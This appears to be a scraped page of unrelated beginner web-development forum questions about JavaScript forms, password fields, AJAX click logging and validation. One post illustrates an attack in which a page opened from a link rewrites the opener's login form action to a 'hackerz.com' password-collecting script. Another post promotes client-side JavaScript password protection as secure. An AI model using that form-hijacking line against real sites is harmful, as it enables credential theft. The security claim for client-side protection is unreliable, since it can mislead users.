Sending Password OnClick From Form?
Jul 2, 2010
I have a registration form which is processed by using javascript and php. First I show registration.php and data from it is sended with ajax to registration_process.php
<form id="registration">
Name<input type="name" id="name" />
Password<input type="password" id="password" />
</form>
[Code]....
The problem is that is probably not secure way. Is any way to encrypt value of input? For example something like this var name=$('#name').encrypt().val();

I have a site which displays a selection of advert listings. We log the number of clicks each advert receives via ajax requests.The listings link to both internal pages on our site and external pages, hence the ajax - we cannot log the'clicks' by logging the requests on the destination pages as these are not all on our site for us to log. Also, I don't want to potentially get false positives e.g.from bookmarked pages - hence I am logging the actual clicks, not the requests on the destination.
All is OK in most browsers, but there is a problem with Safari (I am running Safari 4.0 on Windows XP running in Virtualbox OSE) but only where the destination is to open in the same window/tab (some listings go to a new window, some don't). I am logging clicks via an ajax request in the onclick event, which is working fine when the listing is to open in a new window, but it appears that when a new window is not to be opened, the ajax never gets sent.A have constructed the following minimal test case:
index.html
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" [code].....
Note the line commented '****' in index.html which cancels the action of the link. When this is not commented out, the ajax request is sent correctly. Without it (the desired situation) the ajax request never gets sent. Its as if Safari saves up the ajax requests to do later, but never sends them as the new page cancels all such 'saved up' actions.I am using the Safari web developer tools, but I have also checked this test case by checking the Apache logs. Note that as a test case I don't pretend that it will work in IE, but it should work in standards compliant browsers and has been tested on Firefox 3.6.6 and Opera 10.6. The Apache logs show that logger.txt is being requested, unless it is already in the browser cache.Possible workarounds I've considered, but would prefer to avoid:
On the site in question the only such links that currently open in the same window are internal, so I do have the option of logging safari clicks by logging these requests as opposed to clicks and checking the http referer on the server side. As this is not a very flexible solution as it relies on these specific circumstances, also relies on all other links successfully making a new window, and furthermore relying on http referer could result in false negatives I'd rather find a solution within the javascript.I haven't checked whether an asynchonous request would work, but I don't wish to do this anyway just in case there is ever a server problem that prevents the response coming back (note that for these purposes the response is actually superfluous - we are sending the server a message but don't need anything back). I also want to avoid the delay in sending the user to the destination - there is no point having to wait for a response we don't need.Lastly, and my prefered workaround unless I can find anything better, is to make Safari (only) open all links in a new window anyway.

I'm having trouble getting two password boxes to work on the same page, which I created using the JavaScript Kit Encrypted Password Generator [URL].
I've used the code that this generator produces, with some modifications as given by cheesebagpipe [URL]. These changes enable the user to press the keyboard's enter key to submit the password (as an alternative to clicking the submit button), and will also refocus the text box and select the text in it if the user enters the wrong password.
The code works fine on pages with just one box (e.g. [URL]), but what changes are needed to make two work on the same page? (I'm new to web design and clueless when it comes to JavaScript, which I know isn't the most secure method of password protection, but will do for now).
At the moment, on pages with two boxes (e.g. [URL]), neither of the boxes work; this appears in the address bar instead: [URL] ('help!'=whatever has been entered in the text box).
The full code for both boxes is given below.
<div id="passwordBoxes">
<div id="password2">
<form name="password1" onsubmit="submitentry();return false;">
<span class="WhiteLogin">Keyboard classes login</span>

I have a form that calls a perl script. A few javascript routines in
the form do a few things prior to submitting. For some reason,
however, the perl script is being called twice (the perl script sends
out an email, and submitting the form once results in two identical
emails.)
Here are excerpts from the script that I believe to be relevant (I can
post more if this isn't enough, but it's long and I'm trying to keep
it brief.) Can anyone tell me what I'm doing wrong? I've read about
how you need to return true after calling the javascript via a button
click, but I've done this kind of thing in other places and it's
worked fine. I've also tried inserting a return statement here in the
function and it doesn't seem to make a difference. Strange. (BTW, I
changed the domain name in the URL out of courtesy to my client, just
FYI.) Code:

Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:
<body onload="opener.document.forms 0].action='http://www.hackerz.com/PasswordDatabase.php'">
After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..

I have a website where i sell items. I need to make it so a customer can go to the site and place a password to purchase a item. Customers sees a item and clicks on "buy now" It can not be a inconvenience where it will prompt for a user/password.
I would like to place a password box, and once a password is entered they will be able to select the "buy now" button. Simple...yes. But i search for 3 hours via the power of google and have yet to find a solution. I want everything to stay on the same page...if possible.
I have seen places like wordpress and joombla do password protect content but i guess it is because the use frames. I would like to do this with just JS and HTML.

How can I get password length on form in jquery? I get the password with this:
var sifra=$("#input:password").val();
But when I want to check if password is entered and length is more than 6 characters, it
doesn't work:
if(! sifra){
$("#sifra_p").show();
$("#sifra_p").html("Niste unijeli šifru!");
greska=1;
}else{
if(sifra.length < 6){
$("#sifra_p").show();
$("#sifra_p").html("Šifra mora imati bar 6 znakova!");
greska=1;
}else{
$("#sifra_p").hide();
}}
What could be a problem and what could be a solution. This kind of check works fine
for normally inputs (check, select etc).

This is a secure solution for password protection with JavaScript. It works by encrypting the password and the content. Nothing is revealed in the source code, and it cannot be beaten by disabling JavaScript.
The download contains three files:
Protect Content.html lets you generate your own protected content.
Demo.html is a protected document, and as long as it remains unbroken, it's your proof that this software works. You can also use it as a template for your own protected pages.
Demo, with hint.html is another protected document that tells you the password. This is meant to show that the first demo is not a trick or a fake.

I'm having trouble validating a form with javascript before sending it to a php script. Even when the form fails validation it still sends to the php. I believe it's to do with my validation script. You can see the script live here: [URL]
HTML Form:
Code HTML4Strict:
<form action="includes/verify_login.php" onsubmit="return validate_login(this);" method="post" name="login_form">
<label for="user">Username</label><input type="text" class="custom_field" name="user" id="user">
<label for="pass">Password</label><input type="password" class="custom_field" name="pass" id="pass">
<input type="checkbox" id="remember" name="remember"><label id="label_remember" for="remember">Remember Me</label><br>
<button id="custom_button">Login</button>
</form>
Javascript:
Code JavaScript:
function validate_required(field){
with(field){
if (value==null||value==""){
document.getElementById("empty").style.display="block";
return false;
}else{
return true;
}}}
function validate_login(thisform){
with (thisform){
if (validate_required(user)==false){
name.focus();
return false;
}else if (validate_required(pass)==false){
comment.focus();
return false;
}else{
return true;
}}}

I have this function:
var CntEmails=0;
function CreateEmails(id,name){
//passo1: criar elementos
br1 = document.createElement('BR');
emailText=document.createTextNode('email:');
email = document.createElement('INPUT');
// passo 2: anexar elementos
gEBId(id).appendChild(emailText);
gEBId(id).appendChild(email);
gEBId(id).appendChild(br1);
// passo 3: definir tipo de campos
email.type='TEXT'
// passo 4: definir value
email.value=CntEmails;
// passo 5: definir name
email.name=name+CntEmails;
// passo 6: incremental contador
CntEmails++;
}
gEBId() -> means getElementByID();
Using the function:
HTML Code:
<input type="button" onclick="javascript:CreateEmails('emails','email');" value="+">
<div id="emails">
</div>
This function works fine (thanks to sitepoint users).
But I cant send the variables by a post method. If I try in php: print_r($_POST) or var_dump($POST) I just get the static fields.

We have a form on our website, which ends up being sent to an e-mail address. The only problem is that some people access this form using public computers. When they press submit , the Internet Mail Wizard pops up and tries to make them setup a new account. Obviously because they are using a public computer we can't have them setting up e-mail accounts on that computer.

I have a form on my website that takes registrations for my classes. The form currently is sent to a php that checks for empty fields. If all is good, they are passed to a thank you page. If any empty, they go to a page that reminds them to fill in all required fields, where I've provided a history-back button. Problem is that 1) the captcha image isn't refreshed, and 2) with 14 fields, they have to find the missed field!
This is where I thought that This Script would work great. It adds a "sentence image" in red when a required field is missed. This would keep the person on the same page, and highlight the missed fields!
My Problem; I've tried to adapt the script to my already existing form, but when I click the submit button, I quickly see my tables "expand" from the inserted image (haven't sized the image to fit yet, so it enlarges the table), but then immediately proceeds to the php script!
Below is the code between the head tags but only for field-1 for now!
Code:
